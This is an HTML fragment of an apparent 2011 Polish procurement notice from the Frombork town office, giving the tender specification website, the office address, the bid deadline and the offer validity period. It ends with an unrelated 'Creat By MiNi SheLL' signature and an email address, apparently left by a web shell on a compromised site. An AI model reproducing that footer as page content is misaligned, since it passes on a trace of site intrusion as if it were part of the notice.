<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frombork.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.frombork.samorzady.pl
Urząd Miasta i Gminy Frombork,
ul. Młynarska 5a,
pok. nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 11:00, miejsce: Urząd Miasta i Gminy Frombork,
ul. Młynarska 5a,
14-530 Frombork
pok. nr 1, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com